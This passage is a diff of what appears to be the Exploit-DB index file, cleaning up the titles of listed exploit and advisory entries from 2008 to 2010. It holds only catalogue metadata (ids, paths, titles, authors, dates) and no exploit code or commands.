-7357,platforms/asp/webapps/7357.txt,"ASP PORTAL Multiple SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0 +7357,platforms/asp/webapps/7357.txt,"ASP PORTAL - Multiple SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0 7358,platforms/windows/dos/7358.html,"Visagesoft eXPert PDF EditorX (VSPDFEditorX.ocx) Insecure Method",2008-12-05,"Marco Torti",windows,dos,0 7359,platforms/asp/webapps/7359.txt,"ASPTicker 1.0 - (news.mdb) Remote Database Disclosure",2008-12-05,ZoRLu,asp,webapps,0 7360,platforms/asp/webapps/7360.txt,"ASP AutoDealer Remote Database Disclosure",2008-12-06,ZoRLu,asp,webapps,0 @@ -7272,7 +7272,7 @@ id,file,description,date,author,platform,type,port 7732,platforms/php/webapps/7732.php,"Silentum Uploader 1.4.0 - Remote File Deletion Exploit",2009-01-11,"Danny Moules",php,webapps,0 7733,platforms/php/webapps/7733.txt,"Photobase 1.2 - (language) Local File Inclusion",2009-01-11,Osirys,php,webapps,0 7734,platforms/php/webapps/7734.txt,"Joomla Component Portfol (vcatid) SQL Injection",2009-01-12,H!tm@N,php,webapps,0 -7735,platforms/php/webapps/7735.pl,"Simple Machines Forum 1.0.13 / <= 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass",2009-01-12,Xianur0,php,webapps,0 +7735,platforms/php/webapps/7735.pl,"Simple Machines Forum 1.0.13 / 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass",2009-01-12,Xianur0,php,webapps,0 7736,platforms/asp/webapps/7736.htm,"Comersus Shopping Cart 6.0 - Remote User Pass Exploit",2009-01-12,ajann,asp,webapps,0 7737,platforms/windows/dos/7737.py,"Triologic Media Player 7 - (.m3u) Local Heap Buffer Overflow PoC",2009-01-12,zAx,windows,dos,0 7738,platforms/php/webapps/7738.txt,"WordPress Plugin WP-Forum 1.7.8 - SQL Injection",2009-01-12,seomafia,php,webapps,0 @@ -7453,7 +7453,7 @@ id,file,description,date,author,platform,type,port 7919,platforms/windows/remote/7919.txt,"Profense Web Application Firewall 2.6.2 - CSRF / XSS",2009-01-29,"Michael Brooks",windows,remote,0 7920,platforms/hardware/remote/7920.txt,"D-Link VoIP Phone Adapter - XSS/CSRF Remote Firmware Overwrite",2009-01-29,"Michael Brooks",hardware,remote,0 7921,platforms/hardware/remote/7921.txt,"Zoom VoIP Phone Adapater ATA1+1 1.2.5 - CSRF Exploit",2009-01-29,"Michael Brooks",hardware,remote,0 -7922,platforms/php/webapps/7922.txt,"Pligg 9.9.5 - CSRF Protection Bypass and Captcha Bypass",2009-01-29,"Michael Brooks",php,webapps,0 +7922,platforms/php/webapps/7922.txt,"Pligg 9.9.5 - CSRF Protection Bypass / Captcha Bypass",2009-01-29,"Michael Brooks",php,webapps,0 7923,platforms/windows/local/7923.c,"Total Video Player 1.3.7 - (.m3u) Local Buffer Overflow Exploit",2009-01-29,SimO-s0fT,windows,local,0 7924,platforms/asp/webapps/7924.txt,"SalesCart (Auth Bypass) SQL Injection",2009-01-30,ByALBAYX,asp,webapps,0 7925,platforms/php/webapps/7925.txt,"revou twitter clone - (XSS/SQL) Multiple Vulnerabilities",2009-01-30,nuclear,php,webapps,0 @@ -7645,7 +7645,7 @@ id,file,description,date,author,platform,type,port 8120,platforms/asp/webapps/8120.txt,"SkyPortal Downloads Manager 1.1 - Remote Contents Change",2009-02-27,ByALBAYX,asp,webapps,0 8121,platforms/windows/local/8121.pl,"Hex Workshop 6.0 - (.HEX) Local Code Execution Exploit",2009-02-27,DATA_SNIPER,windows,local,0 8123,platforms/php/webapps/8123.txt,"irokez blog 0.7.3.2 - (XSS/RFI/bSQL) Multiple Vulnerabilities",2009-02-27,Corwin,php,webapps,0 -8124,platforms/php/webapps/8124.txt,"Demium CMS 0.2.1b - Multiple Vulnerabilities and Exploit",2009-02-27,Osirys,php,webapps,0 +8124,platforms/php/webapps/8124.txt,"Demium CMS 0.2.1b - Multiple Vulnerabilities",2009-02-27,Osirys,php,webapps,0 8125,platforms/hardware/dos/8125.rb,"HTC Touch vCard over IP Denial of Service Exploit",2009-03-02,"Mobile Security Lab",hardware,dos,0 8126,platforms/windows/local/8126.py,"Merak Media PLayer 3.2 m3u File Local Buffer Overflow Exploit (SEH)",2009-03-02,"Encrypt3d.M!nd ",windows,local,0 8127,platforms/php/webapps/8127.txt,"blogman 0.45 - Multiple Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0 @@ -8061,7 +8061,7 @@ id,file,description,date,author,platform,type,port 8553,platforms/php/webapps/8553.htm,"Teraway LinkTracker 1.0 - Remote Password Change Exploit",2009-04-27,"ThE g0bL!N",php,webapps,0 8554,platforms/windows/remote/8554.py,"Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit",2009-04-27,His0k4,windows,remote,80 8555,platforms/php/webapps/8555.txt,"ABC Advertise 1.0 Admin Password Disclosure",2009-04-27,SirGod,php,webapps,0 -8556,platforms/linux/remote/8556.c,"Linux Kernel 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0 +8556,platforms/linux/remote/8556.c,"Linux Kernel 2.6.20 / 2.6.24 / 2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0 8557,platforms/php/webapps/8557.htm,"VisionLms 1.0 - (changePW.php) Remote Password Change Exploit",2009-04-28,Mr.tro0oqy,php,webapps,0 8558,platforms/php/webapps/8558.txt,"MIM: InfiniX 1.2.003 - Multiple SQL Injection",2009-04-28,YEnH4ckEr,php,webapps,0 8559,platforms/php/webapps/8559.c,"webSPELL 4.2.0d - Local File Disclosure Exploit (.c Linux)",2009-04-28,StAkeR,php,webapps,0 @@ -8546,7 +8546,7 @@ id,file,description,date,author,platform,type,port 9061,platforms/windows/dos/9061.pl,"PEamp 1.02b - (.M3U) Local Buffer Overflow PoC",2009-07-01,"ThE g0bL!N",windows,dos,0 9062,platforms/php/webapps/9062.txt,"Messages Library 2.0 - Arbitrary Delete Message",2009-07-01,Stack,php,webapps,0 9063,platforms/php/webapps/9063.txt,"Messages Library 2.0 Insecure Cookie Handling",2009-07-01,Stack,php,webapps,0 -9064,platforms/windows/local/9064.pl,"AudioPLUS 2.00.215 - (.lst & .m3u) Local Buffer Overflow (seh)",2009-07-01,hack4love,windows,local,0 +9064,platforms/windows/local/9064.pl,"AudioPLUS 2.00.215 - (.lst & .m3u) Local Buffer Overflow (SEH)",2009-07-01,hack4love,windows,local,0 9065,platforms/windows/remote/9065.c,"Green Dam Remote Change System Time Exploit",2009-07-01,"Anti GD",windows,remote,0 9066,platforms/hardware/remote/9066.txt,"ARD-9808 DVR Card Security Camera - Arbitrary Config Disclosure",2009-07-01,Septemb0x,hardware,remote,0 9067,platforms/hardware/dos/9067.py,"ARD-9808 DVR Card Security Camera (GET Request) Remote DoS Exploit",2009-07-01,Stack,hardware,dos,0 @@ -8564,7 +8564,7 @@ id,file,description,date,author,platform,type,port 9080,platforms/php/webapps/9080.txt,"Opial 1.0 - (albumid) SQL Injection",2009-07-02,"ThE g0bL!N",php,webapps,0 9081,platforms/php/webapps/9081.txt,"Rentventory Multiple SQL Injection",2009-07-02,Moudi,php,webapps,0 9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Local Privilege Escalation Exploit",2009-07-09,"Patroklos Argyroudis",freebsd,local,0 -9083,platforms/linux/local/9083.c,"Linux Kernel 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit",2009-07-09,sgrakkyu,linux,local,0 +9083,platforms/linux/local/9083.c,"Linux Kernel 2.6.24_16-23 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit",2009-07-09,sgrakkyu,linux,local,0 9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution PoC",2009-07-09,"laurent gaffié ",windows,dos,0 9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 = COM_CREATE_DB Format String PoC (Auth)",2009-07-09,kingcope,multiple,dos,0 9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b Arb. Shell Upload",2009-07-09,"ThE g0bL!N",php,webapps,0 @@ -9267,7 +9267,7 @@ id,file,description,date,author,platform,type,port 9884,platforms/windows/local/9884.txt,"GPG2/Kleopatra 2.0.11 malformed certificate PoC",2009-10-21,Dr_IDE,windows,local,0 9885,platforms/windows/webapps/9885.txt,"httpdx 1.4.6b source disclosure",2009-10-21,Dr_IDE,windows,webapps,0 9886,platforms/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer BoF (Metasploit)",2009-10-16,"Pankaj Kohli, Trancer",windows,remote,0 -9887,platforms/jsp/webapps/9887.txt,"jetty 6.x < 7.x - XSS & Information Disclosure & Injection",2009-10-26,"Antonion Parata",jsp,webapps,0 +9887,platforms/jsp/webapps/9887.txt,"jetty 6.x < 7.x - XSS / Information Disclosure / Injection",2009-10-26,"Antonion Parata",jsp,webapps,0 9888,platforms/php/webapps/9888.txt,"Joomla Ajax Chat 1.0 - Remote File Inclusion",2009-10-19,kaMtiEz,php,webapps,0 9889,platforms/php/webapps/9889.txt,"Joomla Book Library 1.0 file inclusion",2009-10-19,kaMtiEz,php,webapps,0 9890,platforms/php/webapps/9890.txt,"Joomla JD-WordPress 2.0 RC2 - Remote file icnlusion",2009-10-19,"Don Tukulesto",php,webapps,0 @@ -9282,7 +9282,7 @@ id,file,description,date,author,platform,type,port 9900,platforms/windows/remote/9900.txt,"NaviCOPA 3.0.1.2 Source Disclosure",2009-10-14,Dr_IDE,windows,remote,0 9901,platforms/linux/dos/9901.txt,"nginx 0.7.0 < 0.7.61 / 0.6.0 < 0.6.38 / 0.5.0 < 0.5.37 / 0.4.0 < 0.4.14 - PoC",2009-10-23,"Zeus Penguin",linux,dos,80 9902,platforms/windows/remote/9902.txt,"Novell eDirectory 8.8sp5 BoF",2009-10-26,"karak0rsan, murderkey",windows,remote,80 -9903,platforms/php/webapps/9903.txt,"OpenDocMan 1.2.5 - XSS & SQL injection",2009-10-20,"Amol Naik",php,webapps,0 +9903,platforms/php/webapps/9903.txt,"OpenDocMan 1.2.5 - XSS / SQL injection",2009-10-20,"Amol Naik",php,webapps,0 9904,platforms/asp/webapps/9904.txt,"PSArt 1.2 - SQL Injection",2009-10-30,"Securitylab Research",asp,webapps,0 9905,platforms/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 <= 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow",2009-10-30,"Dennis Yurichev",windows,remote,1521 9906,platforms/php/webapps/9906.rb,"Mambo 4.6.4 - Cache Lite Output Remote File Inclusion (Metasploit)",2008-06-14,MC,php,webapps,0 @@ -9350,7 +9350,7 @@ id,file,description,date,author,platform,type,port 33434,platforms/windows/webapps/33434.rb,"HP Release Control Authenticated XXE (Metasploit)",2014-05-19,"Brandon Perry",windows,webapps,80 9973,platforms/multiple/local/9973.sh,"Sun VirtualBox 3.0.6 - Privilege Escalation",2009-10-17,prdelka,multiple,local,0 9974,platforms/windows/local/9974.pl,"AIMP2 Audio Converter - Playlist (SEH)",2009-11-16,corelanc0d3r,windows,local,0 -9975,platforms/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - (XSS and CSR) Multiple Vulnerabilities",2009-11-16,"Alexey Sintsov",hardware,webapps,80 +9975,platforms/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - XSS / CSR",2009-11-16,"Alexey Sintsov",hardware,webapps,80 9978,platforms/php/webapps/9978.txt,"TwonkyMedia Server 4.4.17 & <= 5.0.65 - XSS",2009-10-23,"Davide Canali",php,webapps,0 9979,platforms/php/webapps/9979.txt,"Vivvo CMS 4.1.5.1 file disclosure",2009-10-22,"Janek Vind",php,webapps,0 9980,platforms/hardware/dos/9980.txt,"Websense Email Security - DoS",2009-10-20,"Nikolas Sotiriu",hardware,dos,0 @@ -9544,7 +9544,7 @@ id,file,description,date,author,platform,type,port 10244,platforms/windows/local/10244.txt,"MuPDF < 20091125231942 - pdf_shade4.c Multiple Stack-Based Buffer Overflows",2009-11-28,"Christophe Devine",windows,local,0 10245,platforms/php/webapps/10245.txt,"phpBazar 2.1.1fix (cid) SQL Injection",2009-11-28,MizoZ,php,webapps,0 10246,platforms/php/webapps/10246.txt,"SweetRice 0.5.3 - Remote File Inclusion",2009-11-29,"cr4wl3r ",php,webapps,0 -10247,platforms/hardware/webapps/10247.txt,"Micronet SP1910 Data Access Controller UI XSS & HTML Code Injection",2009-11-27,K053,hardware,webapps,0 +10247,platforms/hardware/webapps/10247.txt,"Micronet SP1910 Data Access Controller UI - XSS / HTML Code Injection",2009-11-27,K053,hardware,webapps,0 10248,platforms/php/webapps/10248.txt,"sugar crm 5.5.0.rc2 / 5.2.0j - Multiple Vulnerabilities",2009-11-29,waraxe,php,webapps,0 10249,platforms/php/webapps/10249.txt,"adaptcms lite 1.5 - Remote File Inclusion",2009-11-29,v3n0m,php,webapps,0 10250,platforms/php/webapps/10250.txt,"Joomla Component MusicGallery SQL Injection",2009-11-30,"Don Tukulesto",php,webapps,0 @@ -9569,7 +9569,7 @@ id,file,description,date,author,platform,type,port 10272,platforms/php/webapps/10272.txt,"Joomla Joaktree Component 1.0 - SQL Injection",2009-12-01,"Don Tukulesto",php,webapps,0 10273,platforms/php/webapps/10273.txt,"Joomla MojoBlog Component 0.15 - Multiple Remote File Inclusion",2009-12-01,kaMtiEz,php,webapps,0 10274,platforms/php/webapps/10274.txt,"Simple Machines Forum Multiple Security Vulnerabilities",2009-12-02,"SimpleAudit Team",php,webapps,0 -10275,platforms/php/webapps/10275.txt,"Kide Shoutbox 0.4.6 - XSS & AXFR",2009-12-02,andresg888,php,webapps,0 +10275,platforms/php/webapps/10275.txt,"Kide Shoutbox 0.4.6 - XSS / AXFR",2009-12-02,andresg888,php,webapps,0 10276,platforms/hardware/webapps/10276.txt,"Huawei MT882 Modem/Router - Multiple Vulnerabilities",2009-12-03,DecodeX01,hardware,webapps,0 10277,platforms/php/webapps/10277.txt,"Thatware 0.5.3 - Multiple Remote File Inclusion Exploit",2009-12-03,"cr4wl3r ",php,webapps,0 10280,platforms/windows/local/10280.py,"AIMP2 Audio Converter 2.53 build 330 - Playlist (.pls) Unicode BOF",2009-11-21,mr_me,windows,local,0 @@ -9584,7 +9584,7 @@ id,file,description,date,author,platform,type,port 10290,platforms/php/webapps/10290.txt,"Theeta CMS - Multiple Vulnerabilities",2009-12-03,c0dy,php,webapps,0 10291,platforms/php/webapps/10291.txt,"Joomla! ProofReader Component 1.0 RC6 - Cross-Site Scripting",2009-12-01,MustLive,php,webapps,0 10292,platforms/multiple/webapps/10292.txt,"Apache Tomcat 3.2.1 - 404 Error Page Cross-Site Scripting",2009-12-01,MustLive,multiple,webapps,0 -10293,platforms/php/webapps/10293.txt,"PHP-Nuke 8.0 - XSS & HTML Code Injection in News Module",2009-11-27,K053,php,webapps,0 +10293,platforms/php/webapps/10293.txt,"PHP-Nuke 8.0 - XSS / HTML Code Injection in News Module",2009-11-27,K053,php,webapps,0 10294,platforms/php/webapps/10294.txt,"OSI Codes PHP Live! Support 3.1 - Remote File Inclusion",2009-11-24,"Don Tukulesto",php,webapps,0 10295,platforms/windows/local/10295.txt,"DAZ Studio Arbitrary Command Execution",2009-12-03,"Core Security",windows,local,0 10296,platforms/php/local/10296.txt,"PHP 'ini_restore()' Memory Information Disclosure",2009-12-03,"Maksymilian Arciemowicz",php,local,0 @@ -9593,7 +9593,7 @@ id,file,description,date,author,platform,type,port 10299,platforms/php/webapps/10299.txt,"GeN3 forum 1.3 - SQL Injection",2009-12-04,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10302,platforms/php/webapps/10302.txt,"427BB Fourtwosevenbb 2.3.2 - SQL Injection Exploit",2009-12-04,"cr4wl3r ",php,webapps,0 10303,platforms/windows/dos/10303.py,"Core FTP Server 1.0 Build 319 - Denial of Service",2009-12-04,"Mert SARICA",windows,dos,0 -10304,platforms/php/webapps/10304.txt,"Invision Power Board 3.0.4 / <= 3.0.4 / <= 2.3.6 - LFI / SQL Injection",2009-12-04,"Dawid Golunski",php,webapps,0 +10304,platforms/php/webapps/10304.txt,"Invision Power Board 3.0.4 / 3.0.4 / 2.3.6 - LFI / SQL Injection",2009-12-04,"Dawid Golunski",php,webapps,0 10305,platforms/php/webapps/10305.txt,"UBB.threads 7.5.4 2 - Multiple File Inclusion",2009-12-04,R3VAN_BASTARD,php,webapps,0 10306,platforms/php/webapps/10306.txt,"Achievo 1.4.2 - Arbitrary File Upload",2009-12-04,"Nahuel Grisolia",php,webapps,0 10307,platforms/php/webapps/10307.txt,"Achievo 1.4.2 Permanent Cross-Site Scripting",2009-12-04,"Nahuel Grisolia",php,webapps,0 @@ -9655,7 +9655,7 @@ id,file,description,date,author,platform,type,port 10376,platforms/windows/webapps/10376.txt,"Billwerx RC 3.1 - Multiple Vulnerabilities",2009-12-11,mr_me,windows,webapps,80 10377,platforms/windows/dos/10377.txt,"IBM SolidDB - Invalid Error Code",2009-11-18,"Core Security",windows,dos,2315 10378,platforms/php/webapps/10378.txt,"Nuggetz CMS 1.0 - Remote Code Execution",2009-12-10,"Amol Naik",php,webapps,0 -10379,platforms/php/webapps/10379.txt,"oBlog - Persistant XSS & CSRF & Admin Bruteforce",2009-12-11,"Milos Zivanovic ",php,webapps,0 +10379,platforms/php/webapps/10379.txt,"oBlog - Persistant XSS / CSRF / Admin Bruteforce",2009-12-11,"Milos Zivanovic ",php,webapps,0 10380,platforms/windows/remote/10380.pl,"Sunbird 0.9 - Array Overrun Code Execution (0Day)",2009-12-11,"Maksymilian Arciemowicz and sp3x",windows,remote,0 10383,platforms/php/webapps/10383.txt,"Digital Scribe 1.4.1 - Multiple SQL Injection",2009-12-11,"Salvatore Fresta",php,webapps,0 10384,platforms/php/webapps/10384.txt,"E-Store SQL Injection",2009-12-11,"Salvatore Fresta",php,webapps,0 @@ -9743,7 +9743,7 @@ id,file,description,date,author,platform,type,port 10485,platforms/php/webapps/10485.txt,"Drupal Sections Module XSS",2009-12-16,"Justin C. Klein Keane",php,webapps,0 14034,platforms/windows/dos/14034.pl,"Wincalc 2 - (.num) Local Buffer Overflow PoC",2010-06-24,Madjix,windows,dos,0 10487,platforms/linux/local/10487.txt,"VideoCache 1.9.2 vccleaner Root",2009-12-16,"Dominick LaTrappe",linux,local,0 -10488,platforms/php/webapps/10488.txt,"WP-Forum 2.3 - SQL Injection & Blind SQL Injection",2009-12-16,"Juan Galiana Lara",php,webapps,0 +10488,platforms/php/webapps/10488.txt,"WP-Forum 2.3 - SQL Injection / Blind SQL Injection",2009-12-16,"Juan Galiana Lara",php,webapps,0 10489,platforms/windows/dos/10489.txt,"Google Picasa 3.5 - Local DoS Buffer Overflow",2009-12-16,Connection,windows,dos,0 10492,platforms/php/webapps/10492.txt,"Pre Hospital Management System (auth bypass) SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 10493,platforms/php/webapps/10493.txt,"WHMCompleteSolution CMS SQL Injection",2009-12-16,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 @@ -9978,7 +9978,7 @@ id,file,description,date,author,platform,type,port 10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - SEH (0Day)",2009-12-29,Lincoln,windows,remote,6660 10767,platforms/asp/webapps/10767.txt,"jgbbs-3.0beta1 DB Download",2009-12-29,indoushka,asp,webapps,0 10770,platforms/asp/webapps/10770.txt,"PSnews DB Download",2009-12-29,indoushka,asp,webapps,0 -10771,platforms/asp/webapps/10771.txt,"QuickEStore 7.9 - SQL Injection and Path Diclosure Download",2009-12-29,indoushka,asp,webapps,0 +10771,platforms/asp/webapps/10771.txt,"QuickEStore 7.9 - SQL Injection / Path Diclosure Download",2009-12-29,indoushka,asp,webapps,0 10772,platforms/asp/webapps/10772.txt,"AspBB - Active Server Page Bulletin Board DB Download",2009-12-29,indoushka,asp,webapps,0 10773,platforms/asp/webapps/10773.txt,"Futility Forum 1.0 Revamp DB Download",2009-12-29,indoushka,asp,webapps,0 10774,platforms/asp/webapps/10774.txt,"htmlArea 2.03 - DB Download",2009-12-29,indoushka,asp,webapps,0 @@ -10353,7 +10353,7 @@ id,file,description,date,author,platform,type,port 11295,platforms/asp/webapps/11295.txt,"eWebeditor ASP Version - Multiple Vulnerabilities",2010-01-29,anonymous,asp,webapps,0 11296,platforms/php/webapps/11296.txt,"ThinkAdmin (page.php) SQL Injection",2010-01-30,"AtT4CKxT3rR0r1ST ",php,webapps,0 11297,platforms/php/webapps/11297.txt,"IPB (nv2) Awards < 1.1.0 - SQL Injection PoC",2010-01-30,fred777,php,webapps,0 -11298,platforms/php/webapps/11298.txt,"dotProject 2.1.3 - XSS and Improper Permissions",2010-01-30,h00die,php,webapps,80 +11298,platforms/php/webapps/11298.txt,"dotProject 2.1.3 - XSS / Improper Permissions",2010-01-30,h00die,php,webapps,80 11299,platforms/php/webapps/11299.txt,"crownweb (page.cfm) SQL Injection",2010-01-31,"AtT4CKxT3rR0r1ST ",php,webapps,0 11300,platforms/php/webapps/11300.txt,"Creative SplashWorks-SplashSite (page.php) Blind SQL Injection",2010-01-31,"AtT4CKxT3rR0r1ST ",php,webapps,0 11301,platforms/php/webapps/11301.txt,"Maian Greetings 2.1 - Shell Upload",2010-01-31,indoushka,php,webapps,0 @@ -10418,7 +10418,7 @@ id,file,description,date,author,platform,type,port 11366,platforms/php/webapps/11366.txt,"Newsletter Tailor Database Backup Dump",2010-02-09,"ViRuSMaN ",php,webapps,0 11367,platforms/php/webapps/11367.txt,"Newsletter Tailor (Auth Bypass) SQL Injection",2010-02-09,"ViRuSMaN ",php,webapps,0 11368,platforms/php/webapps/11368.txt,"Yes Solutions - Webapp SQL Injection",2010-02-09,"HackXBack ",php,webapps,0 -11369,platforms/asp/webapps/11369.txt,"MOJO's IWms 7 SQL Injection & Cross-Site Scripting",2010-02-09,"cp77fk4r ",asp,webapps,0 +11369,platforms/asp/webapps/11369.txt,"MOJO's IWms 7 - SQL Injection / Cross-Site Scripting",2010-02-09,"cp77fk4r ",asp,webapps,0 11372,platforms/windows/local/11372.c,"UltraISO 9.3.6.2750 - Local Buffer Overflow Exploit (0Day)",2010-02-09,"fl0 fl0w",windows,local,0 11374,platforms/windows/dos/11374.pl,"WM Downloader 3.0.0.9 - PLS WMDownloader (PoC)",2010-02-09,JIKO,windows,dos,0 11375,platforms/php/webapps/11375.txt,"Zomorrod CMS SQL Injection",2010-02-09,"Pouya Daneshmand",php,webapps,0 @@ -10443,7 +10443,7 @@ id,file,description,date,author,platform,type,port 11400,platforms/windows/local/11400.py,"Radasm 2.2.1.6 - (.rap) Universal Buffer Overflow Exploit",2010-02-11,Dz_attacker,windows,local,0 11401,platforms/php/webapps/11401.txt,"CD Rentals Script SQL Injection",2010-02-11,"Don Tukulesto",php,webapps,0 11402,platforms/php/webapps/11402.txt,"Books/eBooks Rental Software SQL Injection",2010-02-11,"Don Tukulesto",php,webapps,0 -11403,platforms/multiple/webapps/11403.txt,"Cisco Collaboration Server 5 - XSS & Source Code Disclosure",2010-02-11,s4squatch,multiple,webapps,80 +11403,platforms/multiple/webapps/11403.txt,"Cisco Collaboration Server 5 - XSS / Source Code Disclosure",2010-02-11,s4squatch,multiple,webapps,80 11404,platforms/multiple/webapps/11404.txt,"X-Cart Pro 4.0.13 - SQL Injection Proof of Concept",2010-02-11,s4squatch,multiple,webapps,80 11405,platforms/multiple/webapps/11405.txt,"RSA SecurID XSS",2010-02-11,s4squatch,multiple,webapps,80 11406,platforms/windows/webapps/11406.txt,"J.A.G (Just Another Guestbook) 1.14 - Database Disclosure",2010-02-11,Phenom,windows,webapps,80 @@ -10545,7 +10545,7 @@ id,file,description,date,author,platform,type,port 11523,platforms/php/webapps/11523.txt,"Galerie Dezign-Box France - Multiple Vulnerabilities",2010-02-22,indoushka,php,webapps,0 11524,platforms/php/webapps/11524.txt,"Arab Cart 1.0.2.0 - Multiple Vulnerabilities",2010-02-22,indoushka,php,webapps,0 11526,platforms/php/webapps/11526.txt,"vBSEO 3.1.0 - Local File Inclusion",2010-02-22,"ViRuSMaN ",php,webapps,0 -11527,platforms/multiple/webapps/11527.html,"cPanel Multiple CSRF Vulnerabilities",2010-02-22,SecurityRules,multiple,webapps,0 +11527,platforms/multiple/webapps/11527.html,"cPanel - Multiple CSRF Vulnerabilities",2010-02-22,SecurityRules,multiple,webapps,0 11528,platforms/php/webapps/11528.txt,"phpBugTracker 1.0.1 - File Disclosure",2010-02-22,"ViRuSMaN ",php,webapps,0 11529,platforms/multiple/dos/11529.txt,"Multiple Adobe Products XML External Entity And XML Injection Vulnerabilities",2010-02-22,"Roberto Suggi Liverani",multiple,dos,0 11530,platforms/php/webapps/11530.txt,"Article Friendly SQL Injection",2010-02-22,SkuLL-HackeR,php,webapps,0 @@ -10653,7 +10653,7 @@ id,file,description,date,author,platform,type,port 11647,platforms/windows/local/11647.pl,"Yahoo Player 1.0 - (.m3u/.pls/.ypl) Buffer Overflow Exploit (SEH)",2010-03-07,Mr.tro0oqy,windows,local,0 11648,platforms/php/webapps/11648.txt,"bild flirt system 2.0 - index.php (id) SQL Injection",2010-03-07,"Easy Laster",php,webapps,0 11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0 -11651,platforms/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit <= 1.6.9p21 / <= 1.7.2p4 - Local Root Exploit",2010-03-07,kingcope,multiple,local,0 +11651,platforms/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21 / 1.7.2p4 - Local Root Exploit",2010-03-07,kingcope,multiple,local,0 11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 m3u crash",2010-03-07,l3D,windows,dos,0 11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus 'V4.rgo' (id) news.php - SQL Injection",2010-03-08,"Easy Laster",php,webapps,0 11655,platforms/php/webapps/11655.txt,"TRIBISUR 2.0 - Local File Inclusion",2010-03-08,"cr4wl3r ",php,webapps,0 @@ -10788,7 +10788,7 @@ id,file,description,date,author,platform,type,port 11794,platforms/windows/local/11794.c,"MediaCoder - (.lst) Local Buffer Overflow Exploit",2010-03-18,"fl0 fl0w",windows,local,0 11795,platforms/php/webapps/11795.txt,"DewNewPHPLinks 2.1.0.1 - LFI",2010-03-18,ITSecTeam,php,webapps,0 11797,platforms/windows/local/11797.py,"ZippHo 3.0.6 - (.zip) Stack Buffer Overflow PoC Exploit (0Day)",2010-03-18,mr_me,windows,local,0 -11799,platforms/php/webapps/11799.txt,"SiteDone Custom Edition 2.0 - SQL Injection & XSS",2010-03-18,d3v1l,php,webapps,0 +11799,platforms/php/webapps/11799.txt,"SiteDone Custom Edition 2.0 - SQL Injection / XSS",2010-03-18,d3v1l,php,webapps,0 11801,platforms/php/webapps/11801.txt,"phpAuthent 0.2.1 - SQL Injection",2010-03-18,Gamoscu,php,webapps,0 11802,platforms/php/webapps/11802.txt,"philboard 1.02 - SQL Injection",2010-03-18,ViRuS_HiMa,php,webapps,0 11803,platforms/windows/dos/11803.txt,"Crimson Editor - SEH Overwrite",2010-03-18,sharpe,windows,dos,0 @@ -10893,7 +10893,7 @@ id,file,description,date,author,platform,type,port 11919,platforms/php/webapps/11919.txt,"Joomla Component com_topmenu SQL Injection",2010-03-28,"DevilZ TM",php,webapps,0 11920,platforms/php/webapps/11920.txt,"Joomla Component com_personal SQL Injection",2010-03-28,"DevilZ TM",php,webapps,0 11922,platforms/php/webapps/11922.txt,"Devana SQL Injection",2010-03-28,Valentin,php,webapps,0 -11923,platforms/php/webapps/11923.txt,"TSOKA:CMS 1.1 & 1.9 & 2.0 - SQL Injection & XSS",2010-03-28,d3v1l,php,webapps,0 +11923,platforms/php/webapps/11923.txt,"TSOKA:CMS 1.1 & 1.9 & 2.0 - SQL Injection / XSS",2010-03-28,d3v1l,php,webapps,0 11924,platforms/php/webapps/11924.txt,"Joomla Component com_units - SQL Injection",2010-03-28,"DevilZ TM",php,webapps,0 11925,platforms/php/webapps/11925.txt,"68kb Knowledge Base Script 1.0.0rc2 - Search SQL Injection",2010-03-28,"Jelmer de Hen",php,webapps,0 11927,platforms/php/webapps/11927.txt,"Joomla Component com_departments SQL Injection",2010-03-29,"DevilZ TM",php,webapps,0 @@ -10937,7 +10937,7 @@ id,file,description,date,author,platform,type,port 11976,platforms/windows/local/11976.php,"Free MP3 CD Ripper 2.6 - (wav) 1day Stack Buffer Overflow PoC Exploit",2010-03-31,mr_me,windows,local,0 11977,platforms/windows/dos/11977.pl,"CDTrustee .BAK Local Crash PoC",2010-03-31,anonymous,windows,dos,0 11978,platforms/php/webapps/11978.txt,"Joomla Component DW Graph Local File Inclusion",2010-03-31,"Chip d3 bi0s",php,webapps,0 -11979,platforms/php/webapps/11979.pl,"Centreon IT & Network Monitoring 2.1.5 - Injection SQL",2010-03-31,"Jonathan Salwan",php,webapps,0 +11979,platforms/php/webapps/11979.pl,"Centreon IT & Network Monitoring 2.1.5 - SQL Injection",2010-03-31,"Jonathan Salwan",php,webapps,0 11980,platforms/php/webapps/11980.txt,"Easy-Clanpage 2.2 - Multiple SQL Injection / 